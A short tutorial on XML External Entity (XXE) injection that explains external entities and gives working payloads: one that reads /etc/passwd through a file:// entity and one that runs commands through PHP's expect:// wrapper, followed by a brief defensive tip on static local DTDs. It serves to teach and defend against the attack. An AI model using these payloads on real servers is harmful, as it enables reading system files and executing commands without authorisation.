XML External Entities (XXE) Injection

What is it?

If your web application processes user-submitted XML data, it may be vulnerable to an attack that allows attackers to read arbitrary data on the filesystem.

XML parsers allow the defining of ‘entities’, including references to stuff outside of the XML file, called an ‘external entity’ This can be used to access local or remote content via a URI, not to be confused with a URL. A URI typically looks something like [protocol]://[path]. For example, loading /etc/passwd on a local Linux system would look like:

file:///etc/passwd

Using this to attack

First, we create what is known as a Document Type Definition, or DTD for short. This allows us to define XML elements (the bits that appear like so:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE [DTD-name]
  [<!ELEMENT [element-name] ANY >
   <!ENTITY [entity-name] SYSTEM "[protocol]://[path]" >]>

Where [DTD-name], [element-name], [entity-name], [protocol] and [path] are…the DTD name, XML element name, entity name, protocol and resource path of the thing you’re trying to access. When we want to reference the data in the actual XML, we use the following notation:

&[entity-name];

So our attacking XML, assuming we are trying to read /etc/passwd, would look something like this:

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM  "file:///etc/passwd" >]>
<foo>&xxe;</foo>

Is file access the only thing that can be done with this?

Depending on the server in question, no. If the web server in question has the PHP ‘expect’ module loaded, it is possible to get command execution on the machine like so:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo
  [<!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "expect://[command]" >]>
<foo>`&xxe;`</foo>

How do system administrators protect against this?

The main protection sysadmins can use when defending a service that requires XML data is to simply not trust any DTD data enclosed in the XML and instead use a static DTD stored locally. That way, the attacker cannot redefine the DTD, or any elements and therefore cannot define entities.